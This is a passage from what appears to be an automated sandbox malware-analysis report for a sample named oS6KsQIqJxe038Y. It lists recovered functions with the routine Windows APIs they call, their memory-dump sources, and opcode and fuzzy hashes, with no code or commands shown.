                                                                                        • Instruction ID: 66aad57dcff8c3c397f4cdcaa0d75c86363076f96b8b24e0d0752bf92d22a777
                                                                                        • Opcode Fuzzy Hash: 594c4db02ca9f27e7b134b3ebaf9d977da5a9ba31ec60a5fb2981baf3f0d56d3
                                                                                        • Instruction Fuzzy Hash: E23169B090425ACFCB11DFA9C544A9EFFF1FF09314F14856AC418AB212D379A849CFA1
                                                                                        Function 0BF92118 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0BF92145
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: d1e0a40239454b1a218f7b7c1278263d1721c195ad01501e97893805b9b45a9c
                                                                                        • Instruction ID: 35020f6a1db40d30c315599479bbd898f4de4963c17722967c0943e91e4e9e5e
                                                                                        • Opcode Fuzzy Hash: d1e0a40239454b1a218f7b7c1278263d1721c195ad01501e97893805b9b45a9c
                                                                                        • Instruction Fuzzy Hash: C71170367201509FEF05AB3DAC5487A77AAEFC6A5031500AAE601CB371EE21CC52C750
                                                                                        Function 0726CAA1 Relevance: 1.6, APIs: 1, Instructions: 65windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0726CB25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: a93309f962256a208749241be667d2f7e558e538e218c6db2896dd54fc3c62f4
                                                                                        • Instruction ID: 73e910ded378c61bbe6b77ba1c6566c2712dccf76fa217261c94d4168ccac3b2
                                                                                        • Opcode Fuzzy Hash: a93309f962256a208749241be667d2f7e558e538e218c6db2896dd54fc3c62f4
                                                                                        • Instruction Fuzzy Hash: 2621B0B68093898FCB11DF95C8457DEBFF4EF0A210F15849BD484E7252C378A985CBA1
                                                                                        Function 072660B8 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumThreadWindows.USER32(?,00000000,?), ref: 07266131
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumThreadWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2941952884-0
                                                                                        • Opcode ID: 6d57fcf035424a5297cb1862088377c8803e1310a297da7df52c619cb04ad0e5
                                                                                        • Instruction ID: 868aec46cfc3ee641d9ad36f7edbd7a404554c573188dbd610e271f29c2c52a6
                                                                                        • Opcode Fuzzy Hash: 6d57fcf035424a5297cb1862088377c8803e1310a297da7df52c619cb04ad0e5
                                                                                        • Instruction Fuzzy Hash: 7C2135B191024A8FDB10CF9AC844BEEFBF5FB88310F14842AD458A3250C778AA45CFA5
                                                                                        Function 0133D6A3 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: ed1bcf6f7aaebd75a2cb51e333ed9b654a78261b0661d595b08dde3d5f112f9d
                                                                                        • Instruction ID: 1099c72a20973e1a2024ea071d3945ecd45559a3be938e176e92813bc2ea1b00
                                                                                        • Opcode Fuzzy Hash: ed1bcf6f7aaebd75a2cb51e333ed9b654a78261b0661d595b08dde3d5f112f9d
                                                                                        • Instruction Fuzzy Hash: 0821E4B59003489FDB10CFAAD584ADEBFF5FB48320F14801AE958A7310D379A945CFA4
                                                                                        Function 0133D6A8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0133D72F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 9fede0abd2f90e4217191bd59580a0e25a38621cb236d1b57f864437680f75f2
                                                                                        • Instruction ID: e7c752ffcaaa8c7081d8c5ee9f75c52c8e59b8cd645b3cb0900d04e2c3d366d0
                                                                                        • Opcode Fuzzy Hash: 9fede0abd2f90e4217191bd59580a0e25a38621cb236d1b57f864437680f75f2
                                                                                        • Instruction Fuzzy Hash: 4D21E4B59002489FDB10CF9AD584ADEBFF9FB48310F14801AE918A3310D378A944CFA4
                                                                                        Function 072660C0 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EnumThreadWindows.USER32(?,00000000,?), ref: 07266131
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnumThreadWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2941952884-0
                                                                                        • Opcode ID: 4e180bd597ee9aeb31dbfb008f13c397faaddcc0ad471bf99abe888a41c618c2
                                                                                        • Instruction ID: b0e660d9ad91e337f41d5436dadcbba63846f0deb00f2fdaa2ed9ca76a17206b
                                                                                        • Opcode Fuzzy Hash: 4e180bd597ee9aeb31dbfb008f13c397faaddcc0ad471bf99abe888a41c618c2
                                                                                        • Instruction Fuzzy Hash: 1A2127B190025A8FDB14CF9AC844BEEFBF5FB88320F14842AD458A3350D778A945CFA5
                                                                                        Function 0BF92128 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0BF92145
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 4281e2479cc6ca4c3eccff62ef7a797faacf1b4d7e023590ffdf96c42860c70a
                                                                                        • Instruction ID: 017d2c543362dc6f6befeb020d4e18be53fea4e49204aefda3ae5cf700336876
                                                                                        • Opcode Fuzzy Hash: 4281e2479cc6ca4c3eccff62ef7a797faacf1b4d7e023590ffdf96c42860c70a
                                                                                        • Instruction Fuzzy Hash: 47116D353201109FDE18AB3DD858C2A77EAEFC9A5431540AAE602CB371EE71CC42CB50
                                                                                        Function 0B612000 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B61190F,00000000,03D14128,02D308CC,00000000,?), ref: 0B61206D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 06d3e02ee9eee869f8d405cc3ecf68159a1fa4d41af5836f770741bf35847df1
                                                                                        • Instruction ID: 7be2b83a74428ed574a9263b12e5bb831259b1303fcdd8c4bbd5c8784cf14da5
                                                                                        • Opcode Fuzzy Hash: 06d3e02ee9eee869f8d405cc3ecf68159a1fa4d41af5836f770741bf35847df1
                                                                                        • Instruction Fuzzy Hash: CA1106B58003499FCB10CF9AD444BDEFBF8EB48320F14851AE558A3601C378A585CFA5
                                                                                        Function 0B611C62 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B611882,00000000,00000000,03D14128,02D308CC), ref: 0B611CD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: b7c62923b3b80960d4432d25a8b06047fcd3b8fa77f861f5f99a67b269f9a3bc
                                                                                        • Instruction ID: 0783c73f335cb98d011529596f5ede05c3fc722c0512c068ed31eced81187508
                                                                                        • Opcode Fuzzy Hash: b7c62923b3b80960d4432d25a8b06047fcd3b8fa77f861f5f99a67b269f9a3bc
                                                                                        • Instruction Fuzzy Hash: A81117B5C002499FCB10CF9AD545ADEBBF8FB48320F14842AE958A3250C378A545CFA5
                                                                                        Function 0B6105C0 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B611882,00000000,00000000,03D14128,02D308CC), ref: 0B611CD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: 8903492ec1cab6e926904b11faa86f54afb42af881a3a7cff327261f4a503028
                                                                                        • Instruction ID: 06016b5c4487df2afa661926b6d06971eca1d8e765ff519ef75be52ba2bfbc70
                                                                                        • Opcode Fuzzy Hash: 8903492ec1cab6e926904b11faa86f54afb42af881a3a7cff327261f4a503028
                                                                                        • Instruction Fuzzy Hash: B21114B58043499FCB10DF9AD544BEEBBF8FB08320F14842AE958B3240C378A944CFA1
                                                                                        Function 0B6105D8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B61190F,00000000,03D14128,02D308CC,00000000,?), ref: 0B61206D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 6e877a9139eba3f02a5f2c4496e8dd34b87d7e1549caaa824c3c7bc97656e70e
                                                                                        • Instruction ID: 9570eeccafab4a630c77a522d648501f8de83035a9bfeb6d1146475031297b6e
                                                                                        • Opcode Fuzzy Hash: 6e877a9139eba3f02a5f2c4496e8dd34b87d7e1549caaa824c3c7bc97656e70e
                                                                                        • Instruction Fuzzy Hash: 2411E4B5C003499FDB10DF9AD844BEEBBF8FB48320F14852AE558A3251C378A545CFA5
                                                                                        Function 07266AA0 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?,?,?,?,?,07267999,?,?,00000000), ref: 07267A0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 06168cd3cb25b89dd3c043991e6ca3899807e4853267af58ab1fe269094d0410
                                                                                        • Instruction ID: cc2eb7071bcb7117b3d27834c9528a76fdd3daf05b37608aa385572e6cbfa648
                                                                                        • Opcode Fuzzy Hash: 06168cd3cb25b89dd3c043991e6ca3899807e4853267af58ab1fe269094d0410
                                                                                        • Instruction Fuzzy Hash: 3B1176B58103888FCB10DF99D848BDEBFF8EB09324F10845AD558A7310C379A980CFA4
                                                                                        Function 0133B3B3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0133B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 7e23d0cf4a190bd90cf8370146a2e9a257e9f23e96caad23f7823b09718efcba
                                                                                        • Instruction ID: 8cbefb27c7d81ccaf392fa5acdea9177404cc882cb3f7243f4d226e6a01edd83
                                                                                        • Opcode Fuzzy Hash: 7e23d0cf4a190bd90cf8370146a2e9a257e9f23e96caad23f7823b09718efcba
                                                                                        • Instruction Fuzzy Hash: EE1132B5C002898EDB20CFAAD444ADEFBF5AF88324F14845AC458B7200C379A546CFA4
                                                                                        Function 0726CAC8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0726CB25
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 8b9f4338077f7b077cd40244f546db457e89ed9047b3b76d40cab768b5497416
                                                                                        • Instruction ID: a2da72cb0ce06ebc273020efb6d01da78400fe002af8b1a80b6f00b3993ae9bd
                                                                                        • Opcode Fuzzy Hash: 8b9f4338077f7b077cd40244f546db457e89ed9047b3b76d40cab768b5497416
                                                                                        • Instruction Fuzzy Hash: EF110AB58003499FDB10DF9AC445BEEFBF8EB48320F14841AD558A3240D379A584CFA5
                                                                                        Function 07266AAC Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?,?,?,?,?,07267999,?,?,00000000), ref: 07267A0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 31860097f4531ac01475d5d23489cdf8dcfb608415aa80050bd54c5691608846
                                                                                        • Instruction ID: 3c56427c0522e914b980d77e9c22e7e64f53c96d7ca1a6d4c705b95f314ee182
                                                                                        • Opcode Fuzzy Hash: 31860097f4531ac01475d5d23489cdf8dcfb608415aa80050bd54c5691608846
                                                                                        • Instruction Fuzzy Hash: CB11F5B58103499FCB10DF99D449BDEFBF8EB48314F10841AE558A7300D375A984CFA5
                                                                                        Function 0133B3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0133B41E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 57e2cfdbe004971c45478beed51419a8b0f6558c747a559af4f194d861ed1464
                                                                                        • Instruction ID: 86b40cf7981e63c7e19e7bb8f5a8a9cebef634766675bc9f46a3956fadc73243
                                                                                        • Opcode Fuzzy Hash: 57e2cfdbe004971c45478beed51419a8b0f6558c747a559af4f194d861ed1464
                                                                                        • Instruction Fuzzy Hash: 15110FB5C003498FDB10CF9AD444ADEFBF5AB88224F14841AD518B7204C379A545CFA5
                                                                                        Function 0B61060C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B6119C7), ref: 0B61253D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        • Opcode ID: 6f0cc9b15a5fe75a10eec9b14f974819ec88e3648b3889ea47e1a3a634153b77
                                                                                        • Instruction ID: 853cb989d24fc91a72bd34c319379fb6818309570165f9ccd72af452752771bd
                                                                                        • Opcode Fuzzy Hash: 6f0cc9b15a5fe75a10eec9b14f974819ec88e3648b3889ea47e1a3a634153b77
                                                                                        • Instruction Fuzzy Hash: B311EDB5C046498FCB20DF9AD448B9EFBF4EB48324F14846AE568A7200D379A545CFA5
                                                                                        Function 072679A9 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?,?,?,?,?,07267999,?,?,00000000), ref: 07267A0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: bac8e9208594ab1445feab9caca1cbbed600019f1b6df12e14afdc98626bf3f5
                                                                                        • Instruction ID: fb91e54aa7be798f148470775e18a28c29c4d0919a8d2863b384858ab10bfea1
                                                                                        • Opcode Fuzzy Hash: bac8e9208594ab1445feab9caca1cbbed600019f1b6df12e14afdc98626bf3f5
                                                                                        • Instruction Fuzzy Hash: 541103B6800349DFCB10DF99D989BDEBBF8EB48314F14840AD558B7200C379AA84CFA0
                                                                                        Function 0B6124D8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B6119C7), ref: 0B61253D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        • Opcode ID: d628005079d7ac961b0283b1fdf4db6f6e1457caa9ea7bbc14a6c6aa8d5ad636
                                                                                        • Instruction ID: b495b0ff431499026e3790197e934b6eba7ca59739ed81e9fa521f20b14201b0
                                                                                        • Opcode Fuzzy Hash: d628005079d7ac961b0283b1fdf4db6f6e1457caa9ea7bbc14a6c6aa8d5ad636
                                                                                        • Instruction Fuzzy Hash: A211FEB5C00649CFCB10DF9AD584B9EBBF5EB48310F14841AD458A7210C378A645CFA5
                                                                                        Function 0114D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 113e0d40593f7b639ec5723f1f2a57d34ae030398688b745cf8148e6a5e97572
                                                                                        • Instruction ID: b74a3156de066a226c804f961730f71172bfa9dce2e60c0bb31352f61a047206
                                                                                        • Opcode Fuzzy Hash: 113e0d40593f7b639ec5723f1f2a57d34ae030398688b745cf8148e6a5e97572
                                                                                        • Instruction Fuzzy Hash: 5B2136B1500204DFDF09DF58E9C0B56BF65FBA8724F28C169E9090B656C33AE416C7A2
                                                                                        Function 0114D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22fb4387f2fe145b2618d5c6f251c675f9d00d2c960a30560f50984d22380484
                                                                                        • Instruction ID: 66bec57c24defa8940c58dc7933058326e2f60c9f298132144f37ed6c0737528
                                                                                        • Opcode Fuzzy Hash: 22fb4387f2fe145b2618d5c6f251c675f9d00d2c960a30560f50984d22380484
                                                                                        • Instruction Fuzzy Hash: EE21F171600240DFDF09DF58E980B26BF75FBA8718F24C569E9090E256C73AD416CAA2
                                                                                        Function 0115D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 27f72bfbd0b5cf4391c28279ce4731cad88309798fb5b99c83a338ccebfd2416
                                                                                        • Instruction ID: 7db71738001e5673879f85f8cb67c5dba83962cb8ca42f191d7b3b6c7dc19890
                                                                                        • Opcode Fuzzy Hash: 27f72bfbd0b5cf4391c28279ce4731cad88309798fb5b99c83a338ccebfd2416
                                                                                        • Instruction Fuzzy Hash: E821F271504204EFDF49DFA8E9C0B26BBA5FB88324F20C56DED194B256C37AD446CB62
                                                                                        Function 0115D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7dd174426a4f66edf3a7771daf9b85ef99f06db188ae05cfb473cd416e7e962
                                                                                        • Instruction ID: a9946641f7127771fb64efe84c8eb6520cf9ac9fe97b3392e3d6b8739c5bf630
                                                                                        • Opcode Fuzzy Hash: c7dd174426a4f66edf3a7771daf9b85ef99f06db188ae05cfb473cd416e7e962
                                                                                        • Instruction Fuzzy Hash: B6210071604200DFDF59DF68E980B26BF65EB88314F20C569DD1A4B256C33AD407CB62
                                                                                        Function 0115D006 Relevance: .1, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262980129.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_115d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ba923628048b09607900ddb8cf967d2431e4b3ba7ebbde702e720d5a509c9469
                                                                                        • Instruction ID: f55e164dd76cd91705e6c06cd69ea9611061c985bcab4e00abf3281ef1cab192
                                                                                        • Opcode Fuzzy Hash: ba923628048b09607900ddb8cf967d2431e4b3ba7ebbde702e720d5a509c9469
                                                                                        • Instruction Fuzzy Hash: B721AC75509380CFDB07CF24D994B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
                                                                                        Function 0114D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 1ed3698094193071afc210ffac5ffa8191370d5735bea7958a8d03e505c4585a
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: EC11CD76404240CFDF06CF54D5C4B56BF61FB94224F28C6A9D9090A656C33AE45ACBA2
                                                                                        Function 0114D4BF Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2262873894.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_114d000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction ID: 72b6e997d8ab8c47f76ad8214ed15c5724670d0c504fec7dc638aec49a2cf086
                                                                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                        • Instruction Fuzzy Hash: 5D11CD72504280CFCF06CF54E5C4B16BF71FB98614F24C6A9D9490B256C336D45ACBA2
                                                                                        Function 0115D1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
